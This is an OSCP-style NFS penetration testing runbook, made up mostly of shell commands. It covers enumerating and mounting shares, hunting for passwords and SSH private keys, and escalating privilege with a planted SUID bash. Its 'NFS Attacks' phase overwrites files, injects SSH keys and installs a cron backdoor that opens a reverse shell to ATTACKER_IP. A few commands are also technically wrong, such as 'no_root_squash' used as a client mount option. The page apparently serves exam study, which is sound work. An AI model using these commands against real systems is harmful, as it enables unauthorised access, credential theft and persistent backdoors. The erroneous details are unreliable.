Network File System

Environment Variables / Setup

export IP=
export PORT=2049

Phase 1: NFS Service Discovery

Nmap NFS Scripts

nmap --script=nfs-* -p$PORT $IP

RPC Services Enumeration

# Check RPC services (NFS typically uses RPC)
nmap -p 111 --script=rpc-grind $IP
rpcinfo -p $IP

Show Exported Shares

# List NFS exports
showmount -e $IP
exportfs -v

Detailed Export Information

# Show mount information
showmount -a $IP
showmount -d $IP

Create Mount Point

mkdir /tmp/nfs_mount

Mount NFS Shares

# Mount discovered shares
mount -t nfs $IP:/path/to/share /tmp/nfs_mount

# Mount with specific NFS version
mount -t nfs -o vers=3 $IP:/path/to/share /tmp/nfs_mount
mount -t nfs -o vers=4 $IP:/path/to/share /tmp/nfs_mount

# Mount with no root squash (if allowed)
mount -t nfs -o vers=3,no_root_squash $IP:/path/to/share /tmp/nfs_mount

Explore Mounted Shares

# List contents
ls -la /tmp/nfs_mount/

# Check permissions
ls -la /tmp/nfs_mount/
find /tmp/nfs_mount/ -type f -readable 2>/dev/null
find /tmp/nfs_mount/ -type f -writable 2>/dev/null

Phase 4: NFS Privilege Escalation

Root Squashing Check

# Check if root squashing is disabled
id
touch /tmp/nfs_mount/root_test
ls -la /tmp/nfs_mount/root_test

UID Manipulation

# Create user with specific UID if needed
sudo useradd -u 1001 tempuser
sudo su tempuser
touch /tmp/nfs_mount/uid_test
ls -la /tmp/nfs_mount/uid_test

SUID Binary Placement

# If writable and no_root_squash
cp /bin/bash /tmp/nfs_mount/bash_suid
chmod +s /tmp/nfs_mount/bash_suid

# Execute from target system
./bash_suid -p

Phase 5: NFS File Analysis

Search for Sensitive Files

# Look for interesting files
find /tmp/nfs_mount/ -name "*.txt" -o -name "*.conf" -o -name "*.log" 2>/dev/null
find /tmp/nfs_mount/ -name "*password*" -o -name "*passwd*" -o -name "*credential*" 2>/dev/null

# Search file contents
grep -r "password\|passwd\|credential" /tmp/nfs_mount/ 2>/dev/null
grep -r "BEGIN RSA PRIVATE KEY\|BEGIN OPENSSH PRIVATE KEY" /tmp/nfs_mount/ 2>/dev/null

SSH Key Discovery

# Look for SSH keys
find /tmp/nfs_mount/ -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "authorized_keys" 2>/dev/null

# Copy SSH keys if found
cp /tmp/nfs_mount/path/to/ssh/key ./
chmod 600 ./id_rsa
ssh -i ./id_rsa user@$IP

Phase 6: NFS Configuration Analysis

Check NFS Configuration

If you gain system access, examine NFS configuration:

cat /etc/exports
cat /etc/fstab | grep nfs

Common Misconfigurations

Look for:

no_root_squash: Allows root access
no_all_squash: Preserves user IDs
rw permissions: Write access
Wide network ranges: Overly permissive access

Phase 7: NFS Attacks

File Overwrite Attack

# If writable share contains important files
# Backup original file first
cp /tmp/nfs_mount/important_file /tmp/nfs_mount/important_file.bak

# Modify file (e.g., cron job, script, config)
echo "malicious_content" > /tmp/nfs_mount/important_file

SSH Key Injection

# If .ssh directory is writable
echo "your_public_key" >> /tmp/nfs_mount/home/user/.ssh/authorized_keys

Cron Job Injection

# If cron directories are writable
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" > /tmp/nfs_mount/etc/cron.d/backdoor

Phase 8: NFS Version Specific

NFSv3 Specific

# NFSv3 uses additional RPC services
rpcinfo -p $IP | grep -E "(nfs|mount|nlockmgr)"

# Mount with NFSv3
mount -t nfs -o vers=3 $IP:/share /tmp/nfs_mount

NFSv4 Specific

# NFSv4 uses different port structure
mount -t nfs -o vers=4 $IP:/share /tmp/nfs_mount

# NFSv4 pseudo-filesystem
mount -t nfs -o vers=4 $IP:/ /tmp/nfs_mount

NFS Security Bypass Techniques

Firewall Bypass

# NFS might use random ports for some services
# Use rpcinfo to discover actual ports
rpcinfo -p $IP

# Connect to specific RPC services
rpcinfo -t $IP 100003  # NFS service

Authentication Bypass

# NFS typically relies on host-based authentication
# May accept connections from any IP if misconfigured

Cleanup

Unmount Shares

umount /tmp/nfs_mount
rmdir /tmp/nfs_mount

Common NFS Ports

111/tcp,udp  - RPC Port Mapper
2049/tcp,udp - NFS
4045/tcp,udp - NFS Lock Manager
4046/tcp,udp - NFS Status Monitor

NFS Enumeration Checklist

RPC service discovery
Export enumeration with showmount
Share mounting and exploration
Permission testing (read/write/execute)
Root squashing verification
Sensitive file search
SSH key discovery
Configuration file analysis
SUID binary placement (if no_root_squash)

Tools Summary

# Discovery and enumeration
nmap, rpcinfo, showmount

# Mounting and exploration
mount, umount, find, grep

# File manipulation
cp, chmod, chown (if no_root_squash)

Next Steps

Once NFS enumeration is complete:

Analyze file permissions and ownership
Search for credentials and sensitive data
Test privilege escalation via UID manipulation
Look for persistence opportunities via file modification

Veilcat

Explorer

Latest

OSCP 🐲

Medjed

OSCP Note Template and Runbooks

2049 NFS

Environment Variables / Setup

Phase 1: NFS Service Discovery

Nmap NFS Scripts

RPC Services Enumeration

Phase 2: NFS Share Enumeration

Show Exported Shares

Detailed Export Information

Phase 3: NFS Share Mounting

Create Mount Point

Mount NFS Shares

Explore Mounted Shares

Phase 4: NFS Privilege Escalation

Root Squashing Check

UID Manipulation

SUID Binary Placement

Phase 5: NFS File Analysis

Search for Sensitive Files

SSH Key Discovery

Phase 6: NFS Configuration Analysis

Check NFS Configuration

Common Misconfigurations

Phase 7: NFS Attacks

File Overwrite Attack

SSH Key Injection

Cron Job Injection

Phase 8: NFS Version Specific

NFSv3 Specific

NFSv4 Specific

NFS Security Bypass Techniques

Firewall Bypass

Authentication Bypass

Cleanup

Unmount Shares

Common NFS Ports

NFS Enumeration Checklist

Tools Summary

Next Steps

Resources

Graph View

Table of Contents

Backlinks